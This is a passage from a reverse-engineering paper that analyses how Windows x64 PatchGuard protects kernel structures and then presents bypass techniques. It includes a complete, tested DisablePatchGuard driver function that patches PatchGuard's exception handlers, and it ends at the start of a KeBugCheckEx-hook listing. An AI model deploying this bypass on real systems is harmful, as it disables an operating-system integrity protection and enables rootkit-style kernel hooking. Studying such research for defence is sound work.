nt!RtlSectionTableFromVirtualAddress | + | 0xe8 | nt!KiOpPrefetchPatchCount | + | 0xf0 | nt!KiProcessListHead | + | 0xf8 | nt!KiProcessListLock | + | 0x100 | nt!PsActiveProcessHead | + | 0x108 | nt!PsLoadedModuleList | + | 0x110 | nt!PsLoadedModuleResource | + | 0x118 | nt!PspActiveProcessMutex | + | 0x120 | nt!PspCidTable | + +--------+-------------------------------------------+ + + PATCHGUARD_CONTEXT function pointers + + +The reason that PatchGuard uses function pointers instead of calling the +symbols directly is most likely due to the relative addressing mode used +in x64. Since the PatchGuard code runs dynamically from unpredictable +addresses, it would be impossible to use the relative addressing mode +without having to fix up instructions -- a task that would no doubt be +painful and not really worth the trouble. The authors do not see any +particular advantage gained in terms of obfuscation by the use of +function pointers stored in the PatchGuard context structure. + +After all of the function pointers have been set up, the initialization +routine proceeds by picking another random pool tag that is used for +subsequent allocations and stores it at offset 0x188 within the +PatchGuard context structure. After that, two more random numbers are +generated, both of which are used later on during the encryption phase +of the structure. One is used as a random number of rotate bits, the +other is used as an XOR seed. The XOR seed is stored at offset 0x190 +and the random rotate bits value is stored at offset 0x18c. + +The next step taken by the initialization routine is to acquire the +number of bits that can be used to represent the virtual address space +by querying the processor via through the cpuid ExtendedAddressSize +(0x80000008) extended function. The result is stored at offset 0x1b4 +within the PatchGuard context structure. + +Finally, the last major step before initializing the individual +protection sub-contexts is the copying of the contents of the INITKDBG +section to the allocated PatchGuard context structure. The copy +operation looks something like the pseudo code below: + + +memmove( + (PCHAR)PatchGuardContext + sizeof(PATCHGUARD_CONTEXT), + NtImageBase + InitKdbgSection->VirtualAddress, + InitKdbgSection->VirtualSize); + + +With the primary portions of the PatchGuard context structure +initialized, the next logical step is to initialize the sub-contexts +that are specific to the things that are actually being protected. + +3.2) Protected Structure Initialization + + +The structures that PatchGuard protects are represented by individual +sub-context structures. These structures are composed at the beginning +by the contents of the parent PatchGuard structure (PATCHGUARD_CONTEXT). +This includes the function pointers and other values assigned to the +parent. The sub-contexts are identified by general types that provide +the validation routine with something to key off of. + +This section will explain how each of the individual structures have +their protection sub-contexts initialized. At the time of this writing, +the structures have their protection sub-contexts initialized in the +order described below: + + + - System images + - SSDT + - GDT/IDT/MSRs + - Debug routines + + +After all the sub-contexts have been initialized, the parent protection +context is XOR'd and a timer is initialized and set. The purpose of +this timer, as will be shown, is to run the validation half of the +PatchGuard subsystem on the data that is collected. Aside from the +specific protection sub-contexts listed in the following subsections, it +was observed by the authors that the routine that initializes the +PatchGuard subsystem also allocated sub-context structures of types that +could not be immediately discerned. In particular, these types had the +sub-context identifiers of 0x4 and 0x5. + +3.2.1) System Images + + +The protection of certain key kernel images is one of the more critical +aspects of PatchGuard's protection schemes. If a driver were still able +to hook functions in nt, ndis, or any other key kernel components, then +PatchGuard would be mostly irrelevant. In order to address this +concern, PatchGuard performs a set of operations that are intended to +ensure that system images cannot be tampered with. The table in figure +shows which kernel images are currently protected by this scheme. + + + +--------------+ + | Image Name | + +--------------+ + | ntoskrnl.exe | + | hal.dll | + | ndis.sys | + +--------------+ + + Protected kernel images + + +The approach taken to protect each of these images is the same. To kick +things off, the address of a symbol that resides within the image is +passed to a PatchGuard sub-routine that will be referred to as +nt!PgCreateImageSubContext. This routine is prototyped as shown below: + + +NTSTATUS PgCreateImageSubContext( + IN PPATCHGUARD_CONTEXT ParentContext, + IN LPVOID SymbolAddress); + + +For ntoskrnl.exe, the address of nt!KiFilterFiberContext is passed in as +the symbol address. For hal.dll, the address of HalInitializeProcessor +is passed. Finally, the address passed for ndis.sys is its entry point +address which is obtained through a call to nt!GetModuleEntryPoint. + +Inside nt!PgCreateImageSubContext, the basic approach taken to protect +the images is through the generation of a few distinct PatchGuard +sub-contexts. The first sub-context is designed to hold the checksum of +an individual image's sections, with a few exceptions. The second and +third sub-contexts hold the checksum of an image's Import Address Table +(IAT) and Import Directory, respectively. These routines all make use +of a shared routine that is responsible for generating a protection +sub-context that holds the checksum for a block of memory using the +random XOR key and random rotate bits stored in the parent PatchGuard +context structure. The prototype for this routine is shown below: + + +typedef struct BLOCK_CHECKSUM_STATE +{ + ULONG Unknown; + ULONG64 BaseAddress; + ULONG BlockSize; + ULONG Checksum; +} BLOCK_CHECKSUM_STATE, *PBLOCK_CHECKSUM_STATE; + +PPATCHGUARD_SUB_CONTEXT PgCreateBlockChecksumSubContext( + IN PPATCHGUARD_CONTEXT Context, + IN ULONG Unknown, + IN PVOID BlockAddress, + IN ULONG BlockSize, + IN ULONG SubContextSize, + OUT PBLOCK_CHECKSUM_STATE ChecksumState OPTIONAL); + + +The block checksum sub-context stores the checksum state at the end of +the PATCHGUARDC_ONTEXT. The checksum state is stored in a +BLOCK_CHECKSUM_STATE structure. The Unknown attribute of the structure is +initialized to the Unknown parameter from +nt!PgCreateBlockChecksumSubContext. The purpose of this field was not +deduced, but the value was set to zero during debugging. + +The checksum algorithm used by the routine is fairly simple. The +pseudo-code below shows how it works conceptually: + + +ULONG64 Checksum = Context->RandomHashXorSeed; +ULONG Checksum32; + +// Checksum 64-bit blocks +while (BlockSize >= sizeof(ULONG64)) +{ + Checksum ^= *(PULONG64)BaseAddress; + Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits); + BlockSize -= sizeof(ULONG64); + BaseAddress += sizeof(ULONG64); +} + +// Checksum aligned blocks +while (BlockSize-- > 0) +{ + Checksum ^= *(PUCHAR)BaseAddress; + Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits); + BaseAddress++; +} + +Checksum32 = (ULONG)Checksum; + +Checksum >>= 31; + +do +{ + Checksum32 ^= (ULONG)Checksum; + Checksum >>= 31; +} while (Checksum); + + +The end result is that Checksum32 holds the checksum of the block which +is subsequently stored in the Checksum attribute of the checksum state +structure along with the original block size and block base address that +were passed to the function. + +For the purpose of initializing the checksum of image sections, +nt!PgCreateImageSubContext calls into nt!PgCreateImageSectionSubContext +which is prototyped as: + + +PPATCHGUARD_SUB_CONTEXT PgCreateImageSectionSubContext( + IN PPATCHGUARD_CONTEXT ParentContext, + IN PVOID SymbolAddress, + IN ULONG SubContextSize, + IN PVOID ImageBase); + + +This routine first checks to see if nt!KiOpPrefetchPatchCount is zero. +If it is not, a block checksum context is created that does not cover +all of the sections in the image. This could presumably be related to +detecting whether or not hot patches have been applied, but this has not +been confirmed. Otherwise, the function appears to enumerate the various +sections included in the supplied image, calculating the checksum across +each. It appears to exclude checksums of sections named INIT, PAGEVRFY, +PAGESPEC, and PAGEKD. + +To account for an image's Import Address Table and Import Directory, +nt!PgCreateImageSubContext calls nt!PgCreateBlockChecksumSubContext on +the directory entries for both, but only if the directory entries exist +and are valid for the supplied image. + +3.2.2) GDT/IDT + + +The protection of the Global Descriptor Table (GDT) and the Interrupt +Descriptor Table (IDT) is another important feature of PatchGuard. The +GDT is used to describe memory segments that are used by the kernel. It +is especially lucrative to malicious applications due to the fact that +modifying certain key GDT entries could lead to non-privileged, +user-mode applications being able to modify kernel memory. The IDT is +also useful, both in a malicious context and in a legitimate context. +In some cases, third parties may wish to intercept certain hardware or +software interrupts before passing it off to the kernel. Unless done +right, hooking IDT entries can be very dangerous due to the +considerations that have to be made when running in the context of an +interrupt request handler. + +The actual implementation of GDT/IDT protection is accomplished through +the use of the nt!PgCreateBlockChecksumSubContext function which is +passed the contents of both descriptor tables. Since the registers that +hold the GDT and IDT are relative to a given processor, PatchGuard +creates a separate context for each table on each individual processor. +To obtain the address of the GDT and the IDT for a given processor, +PatchGuard first uses nt!KeSetAffinityThread to ensure that it's running +on a specific processor. After that, it makes a call to nt!KiGetGdtIdt +which stores the GDT and the IDT base addresses as output parameters as +shown in the prototype below: + + +VOID KiGetGdtIdt( + OUT PVOID *Gdt, + OUT PVOID *Idt); + + +The actual protection of the GDT and the IDT is done in the context of +two separate functions that have been labeled nt!PgCreateGdtSubContext +and PgCreateIdtSubContext. These routines are prototyped as shown +below: + + +PPATCHGUARD_SUB_CONTEXT PgCreateGdtSubContext( + IN PPATCHGUARD_CONTEXT ParentContext, + IN UCHAR ProcessorNumber); + + +PPATCHGUARD_SUB_CONTEXT PgCreateIdtSubContext( + IN PPATCHGUARD_CONTEXT ParentContext, + IN UCHAR ProcessorNumber); + + +Both routines are called in the context of a loop that iterates across +all of the processors on the machine with respect to +nt!KeNumberProcessors. + +3.2.3) SSDT + + +One of the areas most notorious for being hooked by third-party drivers +is the System Service Descriptor Table, also known as the SSDT. This +table contains information about the service tables that are used by the +operating for dispatching system calls. On Windows x64 kernels, +nt!KeServiceDescriptorTable conveys the address of the actual dispatch +table and the number of entries in the dispatch table for the native +system call interface. In this case, the actual dispatch table is +stored as an array of relative offsets in nt!KiServiceTable. The +offsets are relative to the array itself using relative addressing. To +obtain the absolute address of system service routines, the following +approach can be used: + + +lkd> u dwo(nt!KiServiceTable)+nt!KiServiceTable L1 +nt!NtMapUserPhysicalPagesScatter: +fffff800`013728b0 488bc4 mov rax,rsp +lkd> u dwo(nt!KiServiceTable+4)+nt!KiServiceTable L1 +nt!NtWaitForSingleObject: +fffff800`012b83a0 4c89442418 mov [rsp+0x18],r8 + + +The fact that the dispatch table now contains an array of relative +addresses is one hurdle that driver developers who intend to port system +call hooking code from 32-bit platforms to the x64 kernel will have to +overcome. One solution to the relative address problem is fairly +simple. There are plenty of places within the 2 GB of relative +addressable memory that a trampoline could be placed for a hook routine. +For instance, there is often alignment padding between symbols. This +approach is rather hackish and it depends on the fact that PatchGuard is +forcibly disabled. However, there are also other, more elegant +approaches to accomplishing this that require neither. + +As far as protecting the system service table is concerned, PatchGuard +protects both the native system service dispatch table stored in +nt!KiServiceTable as well as the nt!KeServiceDescriptorTable structure +itself. This is done by making use of the +nt!PgCreateBlockChecksumSubContext routine that was mentioned in the +section on system images (). The following code shows how the block +checksum routine is called for both items: + + +PgCreateBlockChecksumSubContext( + ParentContext, + 0, + KeServiceDescriptorTable->DispatchTable, // KiServiceTable + KiServiceLimit * sizeof(ULONG), + 0, + NULL); + +PgCreateBlockChecksumSubContext( + ParentContext, + 0, + &KeServiceDescriptorTable, + 0x20, + 0, + NULL); + + +The reason the nt!KeServiceDescriptorTable structure is also +protected is to prevent the modification of the attribute that +points to the actual dispatch table. + +3.2.4) Processor MSRs + + +The latest and greatest processors have greatly improved the methods +through which user-mode to kernel-mode transitions are accomplished. +Prior to these enhancements, most operating systems, including Windows, +were forced to dedicate a soft-interrupt for exclusive use as a system +call vector. Newer processors have a dedicated instruction set for +dispatching system calls, such as the syscall and sysenter instructions. +Part of the way in which these instructions work is by taking advantage +of a processor-defined model-specific register (MSR) that contains the +address of the routine that is intended to gain control in kernel-mode +when a system call is received. On the x64 architecture, the MSR that +controls this value is named LSTAR which is short for Long System +Target-Address Register. The code associated with this MSR is +0xc0000082. During boot, the x64 kernel initializes this MSR to +nt!KiSystemCall64. + + +In order for Microsoft to prevent third parties from hooking system +calls by changing the value of the LSTAR MSR, PatchGuard creates a +protection sub-context of type 7 in order to cache the value of the MSR. +The routine that is responsible for accomplishing this has been labeled +PgCreateMsrSubContext and its prototype is shown below: + + +PPATCHGUARD_SUB_CONTEXT PgCreateMsrSubContext( + IN PPATCHGUARD_CONTEXT ParentContext, + IN UCHAR Processor); + + +Like the GDT/IDT protection, the LSTAR MSR value must be obtained on a +per-processor basis since MSR values are inherently stored on individual +processors. To support this, the routine is called in the context of a +loop through all of the processors and is passed the processor +identifier that it is to read from. In order to ensure that the MSR +value is obtained from the right processor, PatchGuard makes use of +nt!KeSetAffinityThread to cause the calling thread to run on the +appropriate processor. + +3.2.5) Debug Routines + + +PatchGuard creates a special sub-context (type 6), that is used to +protect some internal routines that are used for debugging purposes by +the kernel. These routines, such as nt!KdpStub, are intended to be used +as a mechanism by which an attached debugger can handle an exception +prior to allowing the kernel to dispatch it. bt!KdpStub is called +indirectly through the nt!KiDebugRoutine global variable from +nt!KiDispatchException. The routine that initializes the protection +sub-context for these routines has been labeled +nt!PgCreateDebugRoutineSubContext and is prototyped as shown below: + + +PPATCHGUARD_SUB_CONTEXT PgCreateDebugRoutineSubContext( + IN PPATCHGUARD_CONTEXT ParentContext); + + +It appears that the sub-context structure is initialized with pointers +to nt!KdpStub, nt!KdpTrap, and nt!KiDebugRoutine. It seems that this +sub-context is intended to protect from a third-party driver modifying +the nt!KiDebugRoutine to point elsewhere. There may be other intentions +as well. + +3.3) Obfuscating the PatchGuard Contexts + + +In order to make it more challenging to locate the PatchGuard contexts +in memory, each context is XOR'd with a randomly generated 64-bit key. +This is accomplished by calling the function that has been labeled +nt!PgEncryptContext that inline XOR's the supplied context buffer and +then returns the XOR key that was used to encrypt it. This function is +prototyped as shown below: + + +ULONG64 PgEncryptContext( + IN OUT PPATCHGUARD_CONTEXT Context); + + +After nt!KiInitializePatchGuard has initialized all of the individual +sub-contexts, the next thing that it does is encrypt the primary +PatchGuard context. To accomplish this, it first makes a copy of the +context on the stack so that it can be referenced in plain-text after +being encrypted. The reason the plain-text copy is needed is so that +the verification routine can be queued for execution, and in order to do +that it is necessary to reference some of the attributes of the context +structure. This is discussed more in the following section. After the +copy has been created, a call is made to nt!PgEncryptContext passing the +primary PatchGuard context as the first argument. Once the verification +routine has been queued for execution, the plain-text copy is no longer +needed and is set back to zero in order to ensure that no reference is +left in the clear. The pseudo code below illustrates this behavior: + + +PATCHGUARD_CONTEXT LocalCopy; +ULONG64 XorKey; + +memmove( + &LocalCopy, + Context, + sizeof(PATCHGUARD_CONTEXT)); // 0x1b8 + +XorKey = PgEncryptContext( + Context); + +... Use LocalCopy for verification routine queuing ... + +memset( + &LocalCopy, + 0, + sizeof(LocalCopy)); + + +3.4) Executing the PatchGuard Verification Routine + + +Gathering the checksums and caching critical structure values is great, +but it means absolutely nothing if there is no means by which it can be +validated. To that effect, PatchGuard goes to great lengths to make the +execution of the validation routine as covert as possible. This is +accomplished through the use of misdirection and obfuscation. + +After all of the sub-contexts have been initialized, but prior to +encrypting the primary context, nt!KiInitializePatchGuard performs one +of its more critical operations. In this phase, the routine that will +be indirectly used to handle the PatchGuard verification is selected at +random from an array of function pointers and is stored at offset 0x168 +in the primary PatchGuard context. The functions found within the array +have a very special purpose that will be discussed in more detail later +in this section. For now, earmark the fact that a verification routine +has been selected. + +Following the selection of a verification routine, the primary +PatchGuard context is encrypted as described in the previous section. +After the encryption completes, a timer is initialized that makes use of +a sub-context that was allocated early on in the PatchGuard +initialization process by nt!KiInitializePatchGuard. The timer is +initialized through a call to nt!KeInitializeTimer where the pointer to +the timer structure that is passed in is actually part of the +sub-context structure allocated earlier. Immediately following the +initialized timer structure in memory at offset 0x88 is the word value +0x1131. When disassembled, these two bytes translate to a xor [rcx], edx +instruction. If one looks closely at the first two bytes of +nt!CmpAppendDllSection, one will see that its first instruction is +composed of exactly those two bytes. Though not important at this +juncture, it may be of use later. + +With the timer structure initialized, PatchGuard begins the process +of queuing the timer for execution by calling a function that has been +labeled nt!PgInitializeTimer which is prototyped as shown below: + + +VOID PgInitializeTimer( + IN PPATCHGUARD_CONTEXT Context, + IN PVOID EncryptedContext, + IN ULONG64 XorKey, + IN ULONG UnknownZero); + + +Inside the nt!PgInitializeTimer routine, a few strange things occur. +First, a DPC is initialized that uses the randomly selected verification +routine described earlier in this section as the DeferredRoutine. The +EncryptedContext pointer that is passed in as an argument is then XOR'd +with the XorKey argument to produce a completely bogus pointer that is +passed as the DeferredContext argument to nt!KeInitializeDpc. The end +result is pseudo-code that looks something like this: + + +KeInitializeDpc( + &Dpc, + Context->TimerDpcRoutine, + EncryptedContext ^ ~(XorKey << UnknownZero)); + + +After the DPC has been initialized, a call is made to nt!KeSetTimer that +queues the DPC for execution. The DueTime argument is randomly +generated as to make it harder to signature with a defined upper bound +in order to ensure that it is executed within a reasonable time frame. +After setting the timer, nt!PgInitializeTimer returns to the caller. + +With the timer initialized and set to execute, nt!KiInitializePatchGuard +has completed its operation and returns to nt!KiFilterFiberContext. The +divide error fault that caused the whole initialization process to start +is corrected and execution is restored back to the instruction following +the div in nt!KiDivide6432, thus allowing the kernel to boot as normal. + +That's only half of the fun, though. The real question now is how the +validation routine gets executed. It seems obvious that it's related to +the DPC routine that was used when the timer was set, so the most +logical place to look is there. Recalling from earlier in this section, +nt!KiInitializePatchGuard selected a validation routine address from an +array of routines at random. This array is found by looking at this +disassembly from the PatchGuard initialization routine: + + +nt!KiDivide6432+0xec3: +fffff800`01423e74 8bc1 mov eax,ecx +fffff800`01423e76 488d0d83c1bdff lea rcx,[nt] +fffff800`01423e7d 488b84c128044300 mov rax,[rcx+rax*8+0x430428] + + +Again, the same obfuscation technique that was used to hide the pool tag +array is used here. By adding 0x430428 to the base address of nt, the +array of DPC routines is revealed: + + +lkd> dqs nt+0x430428 L3 +fffff800`01430428 fffff800`01033b10 nt!KiScanReadyQueues +fffff800`01430430 fffff800`011010e0 nt!ExpTimeRefreshDpcRoutine +fffff800`01430438 fffff800`0101dd10 nt!ExpTimeZoneDpcRoutine + + +This tells us the possible permutations for DPC routines that PatchGuard +may use, but it doesn't tell us how this actually leads to the +validation of the protection contexts. Logically, the next step is to +attempt to understand how one of these routines operates based on the +DeferredContext that is passed to is since it is known, from +nt!PgInitializeTimer, that the DeferredContext argument will point to +the PatchGuard context XOR'd with an encryption key. Of the three, +routines, nt!ExpTimeRefreshDpcRoutine is the easiest to understand. The +disassembly of the first few instructions of this function is shown +below: + + +lkd> u nt!ExpTimeRefreshDpcRoutine +nt!ExpTimeRefreshDpcRoutine: +fffff800`011010e0 48894c2408 mov [rsp+0x8],rcx +fffff800`011010e5 4883ec68 sub rsp,0x68 +fffff800`011010e9 b801000000 mov eax,0x1 +fffff800`011010ee 0fc102 xadd [rdx],eax +fffff800`011010f1 ffc0 inc eax +fffff800`011010f3 83f801 cmp eax,0x1 + + +Deferred routines are prototyped as taking a pointer to the DPC that +they are associated with as the first argument and the DeferredContext +pointer as the second argument. The x64 calling convention tells us +that this would equate to rcx pointing to the DPC structure and rdx +pointing to the DeferredContext pointer. There's a problem though. The +fourth instruction of the function attempts to perform an xadd on the +first portion of the DeferredContext. As was stated earlier, the +DeferredContext that is passed to the DPC routine is the result of an +XOR operation with a pointer which products a completely bogus pointer. +This should mean that the box would crash immediately upon +de-referencing the pointer, right? It's obvious that the answer is no, +and it's here that another case of misdirection is seen. + +The fact of the matter is that nt!ExpTimeRefreshDpcRoutine, +nt!ExpTimeZoneDpcRoutine, and nt!KiScanReadyQueues are all perfectly +legitimate routines that have nothing directly to do with PatchGuard at +all. Instead, they are used as an indirect means of executing the code +that does have something to do with PatchGuard. The unique thing about +these three routines is that they all three de-reference their +DeferredContext pointer at some point as shown below: + + +lkd> u fffff800`01033b43 L1 +nt!KiScanReadyQueues+0x33: +fffff800`01033b43 8b02 mov eax,[rdx] +lkd> u fffff800`0101dd1e L1 +nt!ExpTimeZoneDpcRoutine+0xe: +fffff800`0101dd1e 0fc102 xadd [rdx],eax + + +When the DeferredContext operation occurs a General Protection Fault +exception is raised and is passed on to nt!KiGeneralProtectionFault. +This routine then eventually leads to the execution of the exception +handler that is associated with the routine that triggered the fault, +such as nt!ExpTimeRefreshDpcRoutine. On x64, the exception handling +code is completely different than what most people are used to on +32-bit. Rather than functions registering exception handlers at runtime, +each function specifies its exception handlers at compile time in a way +that allows them to be looked up through a standardize API routine, like +nt!RtlLookupFunctionEntry. This API routine returns information about +the function in the RUNTIMEFUNCTION structure which most importantly +includes unwind information. The unwind information includes the +address of the exception handler, if any. While this is mostly outside +of the scope of this document, one can determine the address of +nt!ExpTimeRefreshDpcRoutine's exception handler by doing the following +in the debugger: + + +lkd> .fnent nt!ExpTimeRefreshDpcRoutine +Debugger function entry 00000000`01cdaa4c for: +(fffff800`011010e0) nt!ExpTimeRefreshDpcRoutine | +(fffff800`011011d0) nt!ExpCenturyDpcRoutine +Exact matches: + nt!ExpTimeRefreshDpcRoutine = + +BeginAddress = 00000000`001010e0 +EndAddress = 00000000`0010110d +UnwindInfoAddress = 00000000`00131274 +lkd> u nt + dwo(nt + 00131277 + (by(nt + 00131276) * 2) + 13) +nt!ExpTimeRefreshDpcRoutine+0x40: +fffff800`01101120 8bc0 mov eax,eax +fffff800`01101122 55 push rbp +fffff800`01101123 4883ec30 sub rsp,0x30 +fffff800`01101127 488bea mov rbp,rdx +fffff800`0110112a 48894d50 mov [rbp+0x50],rcx + + +Looking more closely at this exception handler, it can be seen that it +issues a call to nt!KeBugCheckEx under a certain condition with bug +check code 0x109. This bug check code is what is used by PatchGuard to +indicate that a critical structure has been tampered with, so this is a +very good indication that this exception handler is at least either in +whole, or in part, associated with PatchGuard. + +The exception handlers for each of the three routines are roughly +equivalent and perform the same operations. If the DeferredContext has +not been tampered with unexpectedly then the exception handlers +eventually call into the protection context's copy of the code from +INITKDB, specifically the nt!FsRtlUninitializeSmallMcb. This routine +calls into the symbol named nt!FsRtlMdlReadCompleteDevEx which is +actually what is responsible for calling the various sub-context +verification routines. + +3.5) Reporting Verification Inconsistencies + + +In the event that PatchGuard detects that a critical structure has been +modified, it calls the code-copy version of the symbol named +nt!SdpCheckDll with parameters that will be subsequently passed to +nt!KeBugCheckEx via the function table stored in the PatchGuard context. +The purpose of nt!SdbpCheckDll is to zero out the stack and all of the +registers prior to the current frame before jumping to nt!KeBugCheckEx. +This is presumably done to attempt to make it impossible for a +third-party driver to detect and recover from the bug check report. If +all of the checks go as planned and there are no inconsistencies, the +routine creates a new PatchGuard context and sets the timer again using +the same routine that was selected the first time. + +4) Bypass Approaches + + +With the most critical aspects of how PatchGuard operates explained, the +next goal is to attempt to see if there are any ways in which the +protection mechanisms offered by it can be bypassed. This would entail +either disabling or tricking the validation routine. While there are +many obvious approaches, such as the creation of a custom boot loader +that runs prior to PatchGuard initializing, or through the modification +of ntoskrnl.exe to completely exclude the initialization vector, the +approaches discussed in this chapter are intended to be usable in a +real-world environment without having to resort to intrusive operations +and without requiring a reboot of the machine. In fact, the primary goal +is to create a single standalone function, or a few functions, that can +be dropped into device drivers in a manner that allows them to just call +one routine to disable the PatchGuard protections so that the driver's +existing approaches for hooking critical structures can still be used. + +It is important to note that some of the approaches listed here have not +been tested and are simply theoretical. The ones that have been tested +will be indicated as such. Prior to diving into the particular bypass +approaches, though, it is also important to consider general techniques +for disabling PatchGuard on the fly. First, one must consider how the +validation routine is set up to run and what it depends on to accomplish +validation. In this case, the validation routine is set to run in the +context of a timer that is associated with a DPC that runs from a system +worker thread that eventually leads to the calling of an exception +handler. The DPC routine that is used is randomly selected from a small +pool of functions and the timer object is assigned a random DueTime in +an effort to make it harder to detect. + +Aside from the validation vector, it is also known that when PatchGuard +encounters an inconsistency it will call nt!KeBugCheckEx with a specific +bug check code in an attempt to crash the system. These tidbits of +understanding make it possible to consider a wide range of bypass +approaches. + +4.1) Exception Handler Hooking + + +Since it is known that the validation routines indirectly depend on the +exception handlers associated with the three timer DPC routines to run +code, it stands to reason that it may be possible to change the behavior +of each exception handler to simply become a no-operation. This would +mean that once the DPC routine executes and triggers the general +protection fault, the exception handler will get called and will simply +perform no operation rather than doing the validation checks. This +approach has been tested and has been confirmed to work on the current +implementation of PatchGuard. + +The approach taken to accomplish this is to first find the list of +routines that are known to be associated with PatchGuard. As it stands +today, the list only contains three functions, but it may be the case +that the list will change in the future. After locating the array of +routines, each routine's exception handler must be extracted and then +subsequently patched to return 0x1 and then return. An example function +that implements this algorithm can be found below: + + +static CHAR CurrentFakePoolTagArray[] = + "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc"; + +NTSTATUS DisablePatchGuard() { + UNICODE_STRING SymbolName; + NTSTATUS Status = STATUS_SUCCESS; + PVOID * DpcRoutines = NULL; + PCHAR NtBaseAddress = NULL; + ULONG Offset; + + RtlInitUnicodeString( + &SymbolName, + L"__C_specific_handler"); + + do + { + // + // Get the base address of nt + // + if (!RtlPcToFileHeader( + MmGetSystemRoutineAddress(&SymbolName), + (PCHAR *)&NtBaseAddress)) + { + Status = STATUS_INVALID_IMAGE_FORMAT; + break; + } + + // + // Search the image to find the first occurrence of: + // + // "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc" + // + // This is the fake tag pool array that is used to allocate protection + // contexts. + // + __try + { + for (Offset = 0; + !DpcRoutines; + Offset += 4) + { + // + // If we find a match for the fake pool tag array, the DPC routine + // addresses will immediately follow. + // + if (memcmp( + NtBaseAddress + Offset, + CurrentFakePoolTagArray, + sizeof(CurrentFakePoolTagArray) - 1) == 0) + DpcRoutines = (PVOID *)(NtBaseAddress + + Offset + sizeof(CurrentFakePoolTagArray) + 3); + } + + } __except(EXCEPTION_EXECUTE_HANDLER) + { + // + // If an exception occurs, we failed to find it. Time to bail out. + // + Status = GetExceptionCode(); + break; + } + + DebugPrint(("DPC routine array found at %p.", + DpcRoutines)); + + // + // Walk the DPC routine array. + // + for (Offset = 0; + DpcRoutines[Offset] && NT_SUCCESS(Status); + Offset++) + { + PRUNTIME_FUNCTION Function; + ULONG64 ImageBase; + PCHAR UnwindBuffer; + UCHAR CodeCount; + ULONG HandlerOffset; + PCHAR HandlerAddress; + PVOID LockedAddress; + PMDL Mdl; + + // + // If we find no function entry, then go on to the next entry. + // + if ((!(Function = RtlLookupFunctionEntry( + (ULONG64)DpcRoutines[Offset], + &ImageBase, + NULL))) || + (!Function->UnwindData)) + { + Status = STATUS_INVALID_IMAGE_FORMAT; + continue; + } + + // + // Grab the unwind exception handler address if we're able to find one. + // + UnwindBuffer = (PCHAR)(ImageBase + Function->UnwindData); + CodeCount = UnwindBuffer[2]; + + // + // The handler offset is found within the unwind data that is specific + // to the language in question. Specifically, it's +0x10 bytes into + // the structure not including the UNWIND_INFO structure itself and any + // embedded codes (including padding). The calculation below accounts + // for all these and padding. + // + HandlerOffset = *(PULONG)((ULONG64)(UnwindBuffer + 3 + (CodeCount * 2) + 20) & ~3); + + // + // Calculate the full address of the handler to patch. + // + HandlerAddress = (PCHAR)(ImageBase + HandlerOffset); + + DebugPrint(("Exception handler for %p found at %p (unwind %p).", + DpcRoutines[Offset], + HandlerAddress, + UnwindBuffer)); + + // + // Finally, patch the routine to simply return with 1. We'll patch + // with: + // + // 6A01 push byte 0x1 + // 58 pop eax + // C3 ret + // + + // + // Allocate a memory descriptor for the handler's address. + // + if (!(Mdl = MmCreateMdl( + NULL, + (PVOID)HandlerAddress, + 4))) + { + Status = STATUS_INSUFFICIENT_RESOURCES; + continue; + } + + // + // Construct the Mdl and map the pages for kernel-mode access. + // + MmBuildMdlForNonPagedPool( + Mdl); + + if (!(LockedAddress = MmMapLockedPages( + Mdl, + KernelMode))) + { + IoFreeMdl( + Mdl); + + Status = STATUS_ACCESS_VIOLATION; + continue; + } + + // + // Interlocked exchange the instructions we're overwriting with. + // + InterlockedExchange( + (PLONG)LockedAddress, + 0xc358016a); + + // + // Unmap and destroy the MDL + // + MmUnmapLockedPages( + LockedAddress, + Mdl); + + IoFreeMdl( + Mdl); + } + + } while (0); + + return Status; +} + + +The benefits of this approach include the fact that it is small and +relatively simplistic. It is also quite fault tolerant in the event +that something changes. However, some of the cons include the fact that +it depends on the pool tag array being situated immediately prior to the +array of DPC routine addresses and it furthermore depends on the pool +tag array being a fixed value. It's perfectly within the realm of +possibility that Microsoft will eliminate this assumption in the future. +For these reasons, it would be better to not use this approach in a +production driver, but it is at least suitable enough for a +demonstration. + +In order for Microsoft to break this approach they would have to make +some of the assumptions made by it unreliable. For instance, the array +of DPC routines could be moved to a location that is not immediately +after the array of pool tags. This would mean that the routine would +have to hardcode or otherwise derive the array of DPC routines used by +PatchGuard. Another option would be to split the pool tag array out +such that it isn't a condensed string that can be easily searched for. +In reality, the relative level of complexities involved in preventing +this approach from being reliable to implement are quite small. + +4.2) KeBugCheckEx Hook + + +One of the unavoidable facts of PatchGuard's protection is that it has +to report validation inconsistencies in some manner. In fact, the +manner in which it reports it has to entail shutting down the machine in +order to prevent third-party vendors from being able to continue running +code even after a patch has been detected. As it stands right now, the +approach taken to accomplish this is to issue a bug check with the +symbolic code of 0x109 via nt!KeBugCheckEx. This route was taken so that +the end-user would be aware of what had occurred and not be left in the +dark, literally, if their machine were to all of the sudden shut off or +reboot without any word of explanation. + +The first idea the authors had when thinking about bypass techniques was +to attempt to have nt!KeBugCheckEx return to the caller's caller frame. +This would be necessary because you cannot return to the caller since +the compiler generally inserts a debugger trap immediately after calls +to nt!KeBugCheckEx. However, it may have been possible to return to the +frame of the caller's caller. In other words, the routine that called +the function that lead to nt!KeBugCheckEx being called. However, as +described earlier in this document, the PatchGuard code takes care to +ensure that the stack is zeroed out prior to calling nt!KeBugCheckEx. +This effectively eliminates any contextual references that might be used +on the stack for the purpose of returning to parent frames. As such, +the nt!KeBugCheckEx hook vector might seem like a dead-end. Quite the +contrary, it's not. + +A derivative approach that can be taken without having to worry +about context stored in registers or on the stack is to take advantage +of the fact that each thread retains the address of its own entry point. +For system worker threads, the entry point will typically point to a +routine like nt!ExpWorkerThread. Since multiple worker threads are +spawned, the context parameter passed to the thread is irrelevant as the +worker threads are really only being used to process work items and +expire DPC routines. With this fact in mind, the approach boils down to +hooking nt!KeBugCheckEx and detecting whether or not bug check code +0x109 has been passed. If it has not, the original nt!KeBugCheckEx +routine can be called. However, if it is 0x109, then the thread can be +restarted by restoring the calling thread's stack pointer to its stack +limit minus 8 and then jumping to the thread's StartAddress. The end +result is that the thread goes back to processing work items and +expiring DPC routines like normal. + +While a more obvious approach would be to simply terminate the calling +thread, doing so would not be possible. The operating system keeps +track of system worker threads and will detect if one exits. The act of +a system worker thread exiting will lead to a bluescreen of the system +-- exactly the type of thing that is trying to be avoided. + +The following code implements the algorithm described above. It is +fairly large for reasons that will be discussed after the snippet: + + +== ext.asm + +.data + +EXTERN 